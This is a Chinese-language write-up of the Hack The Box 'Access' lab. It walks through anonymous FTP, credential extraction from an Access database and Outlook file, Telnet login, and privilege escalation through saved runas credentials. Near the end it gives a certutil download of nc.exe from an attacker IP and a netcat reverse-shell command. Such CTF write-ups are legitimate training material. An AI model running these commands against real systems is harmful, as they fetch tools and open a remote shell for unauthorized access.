hack the box-Access Writeup

1、摘要linux

Acces是搭建在Windows平台上的一道CTF题目,探究服务器上的渗透测试shell

2、信息搜集windows

题目就只给出一个IP:10.10.10.98服务器

首先经过Nmap进行端口方面的探测工具

nmap -sV -sT -sC 10.10.10.98

 服务器一共开放了21/Ftp、23/Telnet、80/Http端口,优先方问Http去看看网站测试

3、Web端测试网站

访问Web端口时,就出现了一个机房的照片,可是并无从中看出什么端倪。ui

随后利用gobuster对网站目录进行了枚举url

只跑到/aspnet_client页面spa

而/aspnet_client是403禁止的

4、另寻他路

以前Nmap扫描的时候有在21端口后面出现一句话

ftp-anon: Anonymous FTP login allowed (FTP code 230)

 告诉咱们FTP能够匿名登录

进入Backups发现有个mdb文件,随后下载它

 

不得不说太大了

 emmmm,不知道什么缘由,随后请教大佬。说是要以二进制方式去下载文件,能够防止数据的丢失

若是是linux系统,利用mdbtools工具打开

mdb-tables backups.mdb

 

其中有个auth_user表名值得关注

mdb-export backup.mdb auth_user

 

其中engineer关键词很熟悉,正好是FTP上的另外一个目录的

去ftp上打开另外一个目录,发现一个ZIP文件,并下载

发现打开提取文件须要密码

这里遇到个毛病,估计是解压缩的问题,密码一直错误,最后换到Kali下竟然就能够

pst是Microsoft Outlook电子邮件文件夹

直接下载一个Outlook查看了邮件

他说4Cc3ssC0ntr0ller就是帐户security的密码

随后想到开放了23端口,便Telnet上去

5、权限提高

由于在CTF里,提权通常有自带的漏洞文件,如一个软件、一个脚本等

因此按照思路,去找相关文件

通常来,Linux下经过find找有suid的文件;windows下通常在用户目录下

有Administrator、Public、security三个用户

经判断,只有公共目录三能够利用的(由于administrator目录进不去)

进入public桌面发现有一个lnk文件

用type查看内容

runas.exe???!!!其中还跟上了/savecred参数,这说明保存了系统的凭证,能够经过这个runas反弹一个shell

cmd下能够经过如下命令下载nc.exe

certutil -urlcache -split -f http://10.10.xx.xx/nc.exe nc.exe

再利用runas反弹shell

runas /user:Administrator /savecred "nc.exe -c cmd.exe 10.10.xx.xx 1337"

 

相关文章
相关标签/搜索